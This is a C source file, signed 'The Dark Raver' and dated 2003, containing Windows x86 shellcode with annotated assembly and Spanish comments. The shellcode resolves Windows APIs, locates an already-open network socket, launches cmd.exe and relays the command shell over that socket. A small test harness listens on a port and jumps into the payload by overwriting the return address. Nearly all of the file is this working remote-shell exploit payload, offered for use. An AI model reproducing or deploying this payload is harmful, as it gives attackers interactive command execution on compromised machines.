// The Dark Raver // 28/03/2003 // 739 bytes // PIPES + GETPEERNAME + CMD // - Find API offsets // - Without nulls #include #include #include #include #include #include void salta(void); char hell[]= // ---- Inicializamos ---- "\x55" /* push %ebp */ "\x89\xe5" /* mov %esp,%ebp */ "\x83\xec\x68" /* sub $0x68,%esp */ // ---- Creacion del array de llamadas al API ---- // get_kernel_base: "\x31\xd2" /* xor %edx,%edx */ "\xb2\x30" /* mov $0x30,%dl */ "\x64\x8b\x02" /* mov %fs:(%edx),%eax */ "\x8b\x40\x0c" /* mov 0xc(%eax),%eax */ "\x8b\x70\x1c" /* mov 0x1c(%eax),%esi */ "\xad" /* lods %ds:(%esi),%eax */ "\x8b\x40\x08" /* mov 0x8(%eax),%eax */ // kern_base in eax "\x50" /* push %eax */ // get_getprocaddress: "\x8b\xc8" /* mov %eax,%ecx */ "\x03\x40\x3c" /* add 0x3c(%eax),%eax */ "\x8b\x78\x78" /* mov 0x78(%eax),%edi */ "\x03\xf9" /* add %ecx,%edi */ "\x8b\x77\x20" /* mov 0x20(%edi),%esi */ "\x03\xf1" /* add %ecx,%esi */ "\x33\xd2" /* xor %edx,%edx */ "\x8b\x06" /* mov (%esi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x81\x38\x47\x65\x74\x50" /* cmpl $0x50746547,(%eax) */ "\x75\x1e" /* jne +1e */ "\x81\x78\x04\x72\x6f\x63\x41" /* cmpl $0x41636f72,0x4(%eax) */ "\x75\x15" /* jne +15 */ "\x8b\x47\x24" /* mov 0x24(%edi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x0f\xb7\x1c\x50" /* movzwl (%eax,%edx,2),%ebx */ "\x8b\x47\x1c" /* mov 0x1c(%edi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x8b\x1c\x98" /* mov (%eax,%ebx,4),%ebx */ "\x01\xcb" /* add %ecx,%ebx */ "\xeb\x09" /* jmp +9 */ "\x83\xc6\x04" /* add $0x4,%esi */ "\x42" /* inc %edx */ "\x3b\x57\x18" /* cmp 0x18(%edi),%edx */ "\x75\xcd" /* jne -32 */ // getprocaddress in ebx // kernel_base in edi "\x58" /* pop %eax */ "\x89\xc7" /* mov %eax,%edi */ // push &"CreateProcessA" "\xeb\x02" /* jmp +2 */ "\xeb\x13" /* jmp +(5+14) */ "\xe8\xf9\xff\xff\xff" /* call -7 */ "CreateProcessA" /* command string */ "\x5e" /* popl %esi */ "\x31\xd2" /* xor %edx,%edx */ "\x88\x56\x0e" /* movb %dl,14(%esi) */ "\x56" /* push %esi */ "\x57" /* push %edi */ // CreateProcessA=GetProcAddress(kernel_base. "CreateProcessA") "\xff\xd3" /* call *%ebx */ "\x89\x45\x04" /* mov %eax,0x04(%ebp) */ // push &"CreatePipe" "\xeb\x02" /* jmp +2 */ "\xeb\x7c" /* jmp +7C */ "\xe8\xf9\xff\xff\xff" /* call -7 */ // API Strings "CreatePipe0" "SetStdHandle0" "DuplicateHandle0" "PeekNamedPipe0" "ReadFile0" "WriteFile0" "LoadLibraryA0" "ws2_32.dll0" "getpeername0" "send0" "recv0" "\x5e" /* popl %esi */ // NULL API Strings "\x31\xd2" /* xor %edx,%edx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x7f" /* mov $0x7f,%cl */ "\x80\x3c\x0e\x30" /* cmpb $0x30,(%esi,%ecx,1) */ "\x75\x03" /* jne otra */ "\x88\x14\x0e" /* mov %dl,(%esi,%ecx,1) */ "\xe2\xf5" /* loop bucle */ "\x56" /* push %esi */ "\x57" /* push %edi */ // CreatePipe=GetProcAddress(kernel_base. "CreatePipe") "\xff\xd3" /* call *%ebx */ "\x89\x45\x1C" /* mov %eax,0x1C(%ebp) */ // push &"SetStdHandle" "\x83\xc6\x0b" /* add $0x0b,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // SetStdHandle=GetProcAddress(kernel_base. "SetStdHandle") "\xff\xd3" /* call *%ebx */ "\x89\x45\x20" /* mov %eax,0x20(%ebp) */ // push &"DuplicateHandle" "\x83\xc6\x0d" /* add $0x0d,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // DuplicateHandle=GetProcAddress(kernel_base. "DuplicateHandle") "\xff\xd3" /* call *%ebx */ "\x89\x45\x28" /* mov %eax,0x28(%ebp) */ // push &"PeekNamedPipe" "\x83\xc6\x10" /* add $0x10,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // PeekNamedPipe=GetProcAddress(kernel_base. "PeekNamedPipe") "\xff\xd3" /* call *%ebx */ "\x89\x45\x3C" /* mov %eax,0x3C(%ebp) */ // push &"ReadFile" "\x83\xc6\x0e" /* add $0x0e,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // ReadFile=GetProcAddress(kernel_base. "ReadFile") "\xff\xd3" /* call *%ebx */ "\x89\x45\x40" /* mov %eax,0x40(%ebp) */ // push &"WriteFile" "\x83\xc6\x09" /* add $0x09,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // WriteFile=GetProcAddress(kernel_base. "WriteFile") "\xff\xd3" /* call *%ebx */ "\x89\x45\x4C" /* mov %eax,0x4C(%ebp) */ // push &"LoadLibraryA" "\x83\xc6\x0a" /* add $0x0a,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // LoadLibraryA=GetProcAddress(kernel_base. "LoadLibraryA") "\xff\xd3" /* call *%ebx */ // ws2_32.dll=LoadLibraryA("ws2_32.dll") // push &"ws2_32.dll" "\x83\xc6\x0d" /* add $0x0d,%esi */ "\x56" /* push %esi */ // call LoadLibraryA = 0x1C "\xff\xd0" /* call *%eax */ // ws2_32.dll in %edi "\x89\xc7" /* mov %eax,%edi */ // push &"getpeername" "\x83\xc6\x0b" /* add $0x0b,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // getpeername=GetProcAddress(ws2_32.dll, "getpeername") "\xff\xd3" /* call *%ebx */ "\x89\x45\x08" /* mov %eax,0x20(%ebp) */ // push &"send" "\x83\xc6\x0c" /* add $0x0c,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // send=GetProcAddress(ws2_32.dll, "send") "\xff\xd3" /* call *%ebx */ "\x89\x45\x44" /* mov %eax,0x44(%ebp) */ // push &"recv" "\x83\xc6\x05" /* add $0x05,%esi */ "\x56" /* push %esi */ "\x57" /* push %edi */ // send=GetProcAddress(ws2_32.dll, "send") "\xff\xd3" /* call *%ebx */ "\x89\x45\x48" /* mov %eax,0x48(%ebp) */ // ----------------------------------------- // kernel_base = 0x24(%ebp) // GetProcAddress = 0x20(%ebp) // CreateProcessA = 0x04(%ebp) // CreatePipe = 0x1C(%ebp) // SetStdHandle = 0x20(%ebp) // DuplicateHandle = 0x28(%ebp) // PeekNamedPipe = 0x77E97624 = 0x3C(%ebp) // ReadFile = 0x77E58B82 = 0x40(%ebp) // WriteFile = 0x77e59d8c = 0x4C(%ebp) // LoadLibraryA = 0x0C(%ebp) // ws2_32.dll = 0x28(%ebp) // getpeername = 0x48(%ebp) // send = 0x44(%ebp) // recv = 0x48(%ebp) // ---- Busqueda del socket ---- "\x31\xdb" /* xor %ebx,%ebx */ // x = 16; // &x = 0xffffffe4(%ebp) "\x89\x5d\xe4" /* mov %ebx,0xffffffe4(%ebp) */ "\xc6\x45\xe4\x10" /* movb $0x10,0xffffffe4(%ebp) */ // &serv_addr = 0xfffffde8(%ebp) "\x31\xf6" /* xor %esi,%esi */ // loop "\x83\xc6\x04" /* add $0x4,%esi */ // getpeername(i, (struct sockaddr *)&tdr, &x); "\x8d\x45\xe4" /* lea 0xffffffe4(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */ "\x50" /* push %eax */ "\x56" /* push %esi */ // call getpeername = 0x08(%ebp) "\x90\x90" /* (!!) Win32 ALIGN MADNESS */ "\x8b\x45\x08" /* mov 0x08(%ebp),%eax */ "\xff\xd0" /* call *%eax */ "\x39\xc3" /* cmp %eax,%ebx */ "\x75\xe6" /* jnz loop */ // &hSock=0xffffffcc(%ebp) "\x89\xb5\xcc\xff\xff\xff" /* mov %esi,0xffffffcc(%ebp) */ // ---- Creacion y manipulacion de los handlers ---- // saAttr.nLength = 12; // saAttr.lpSecurityDescriptor = 0; // saAttr.bInheritHandle = 1; "\x31\xd2" /* xor %edx,%edx */ "\x83\xc2\x01" /* add $0x1,%edx */ "\x89\x55\xd8" /* mov %edx,0xffffffd8(%ebp) */ "\x83\xc2\x0b" /* add $0xb,%edx */ "\x89\x55\xd0" /* mov %edx,0xffffffd0(%ebp) */ "\x89\x5d\xd4" /* mov %ebx,0xffffffd4(%ebp) */ // CreatePipe(&hChildStdoutRd, &hChildStdoutWr, &saAttr, 0); "\x53" /* push %ebx */ "\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x50" /* lea 0xffffff50(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x58" /* lea 0xffffff58(%ebp),%eax */ "\x50" /* push %eax */ // call CreatePipe = 0x1C(%ebp) "\xff\x55\x1c" /* call *0x1c(%ebp) */ // SetStdHandle(-11, hChildStdoutWr); "\x8b\x45\x50" /* mov 0xffffff50(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\xf5" /* push $0xffffef5 */ // call SetStdHandle = 0x20(%ebp) "\xff\x55\x20" /* call *0x20(%ebp) */ // DuplicateHandle(-1, hChildStdoutRd, -1, &hChildStdoutRdDup , 0, 0, 2); "\x6a\x02" /* push $0x2 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x54" /* 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ "\x8b\x45\x58" /* mov 0xffffff58(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ // call DuplicateHandle = 0x28(%ebp) "\xff\x55\x28" /* call *0x28(%ebp) */ // CreatePipe(&hChildStdinRd, &hChildStdinWr, &saAttr, 0); "\x53" /* push %ebx */ "\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x68" /* lea 0xffffff68(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x45\x5c" /* lea 0xffffff5c(%ebp),%eax */ "\x50" /* push %eax */ // call CreatePipe = 0x1C(%ebp) "\xff\x55\x1c" /* call *0x1c(%ebp) */ // SetStdHandle(-10, hChildStdinRd); "\x8b\x45\x5c" /* mov 0xffffff5c(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\xf6" /* push $0xfffffff6 */ // call SetStdHandle = 0x20(%ebp) "\xff\x55\x20" /* call *0x20(%ebp) */ // DuplicateHandle(-1, hChildStdinWr, -1, &hChildStdinWrDup, 0, 0, 2); "\x6a\x02" /* push $0x2 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x6c" /* lea 0xffffff6c(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ "\x8b\x45\x68" /* mov 0xffffff68(%ebp),%eax */ "\x50" /* push %eax */ "\x68\xff\xff\xff\xff" /* push $0xffffffff */ // call DuplicateHandle = 0x28(%ebp) "\xff\x55\x28" /* call *0x28(%ebp) */ // ---- Lanzamiento de cmd.exe ---- // memset(&piProcInfo, 0, 16); // &piProcInfo=0xffffefb0(%ebp) "\x8d\xbd\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%edi */ "\x88\xd8" /* mov %bl,%al */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x16" /* mov $0x16,%cl */ "\xf3\xaa" /* repz stos */ // memset(&siStartInfo, 0, 68); // &siStartInfo= 0xffffef60(%ebp) "\x8d\xbd\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%edi */ "\x88\xd8" /* mov %bl,%al */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x68" /* mov $0x68,%cl */ "\xf3\xaa" /* repz stos */ // CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo); "\x8d\x85\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%eax */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x6a\x01" /* push $0x1 */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ // push &cmd.exe "\xeb\x02" /* jmp +2 */ "\xeb\x0d" /* jmp +13 */ "\xe8\xf9\xff\xff\xff" /* call -7 */ "cmd.exe\x20" /* command string */ "\x53" /* push %ebx */ // call CreateProcessA = 0x04(%ebp) "\xff\x55\x04" /* call *0x04(%ebp) */ // ---- Bucle de comunicacion entre socket y handlers ---- // loop: // Delay... "\xb9\x10\x10\x10\x10" /* mov $0x10101010,%ecx */ "\xe2\xfe" /* loop -2 */ // PeekNamedPipe(hChildStdoutRdDup, chBuf, 127, &dwRead, 0, 0); "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x54" /* mov 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ // call PeekNamedPipe = 0x3C(%ebp) "\xff\x55\x3c" /* call *0x3C(%ebp) */ // if(dwRead==0) "\x39\x5d\x60" /* cmp %ebx,0x60(%ebp) */ "\x7e\x2d" /* jle notif */ // ReadFile(hChildStdoutRdDup, chBuf, 127, &dwRead, 0); "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x54" /* mov 0xffffff54(%ebp),%eax */ "\x50" /* push %eax */ // call ReadFile = 0x40(%ebp) "\xff\x55\x40" /* call *0x40(%ebp) */ // send(hSock, chBuf, dwRead, 0); "\x53" /* push %ebx */ "\x8b\x45\x60" /* mov 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */ "\x50" /* push %eax */ // call send = 0x44(%ebp) "\xff\x55\x44" /* call *0x44(%ebp) */ "\xeb\xb1" /* jmp loop */ // notif: // dwRead=recv(hSock, chBuf, 256, 0); "\x53" /* push %ebx */ "\x6a\x7f" /* push $0x127 */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */ "\x50" /* push %eax */ // call recv = 0x48(%ebp) "\xff\x55\x48" /* call *0x48(%ebp) */ // &dwRead=0xffffedb8(%ebp) "\x89\x45\x60" /* mov %eax,0x60(%ebp) */ // WriteFile(hChildStdinWrDup, chBuf, dwRead, &dwRead, 0); "\x53" /* push %ebx */ "\x8d\x45\x60" /* lea 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x60" /* mov 0x60(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x45\x6c" /* mov 0xffffff6c(%ebp),%eax */ "\x50" /* push %eax */ // call WriteFile = 0x4C(%ebp) "\xff\x55\x4C" /* call *0x4C(%ebp) */ // jmp loop "\xe9\x7e\xff\xff\xff" /* jmp loop */ ""; // TDR DWORD main(int argc, char *argv[]) { SOCKET hSock; SOCKET hDes; PROCESS_INFORMATION piProcInfo; STARTUPINFO siStartInfo; struct sockaddr_in serv_addr; WSADATA info; int x; LoadLibraryA("wsock32.dll"); x = 16; WSAStartup(257, &info); //hDes=WSASocket(2, 1, 0, 0, 0, 0); hDes=socket(2, 1, 6); printf("%i\r\n", hDes); serv_addr.sin_family = 2; serv_addr.sin_port = 65295; // 4095 serv_addr.sin_addr.s_addr = 0; bind(hDes, (struct sockaddr *)&serv_addr, 16); listen(hDes, 5); hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x); printf("%i\r\n", hSock); printf("%d\n",strlen(hell)); salta(); } void salta(void) { int *ret; ret = (int *)&ret + 2; (*ret) = (int)hell; }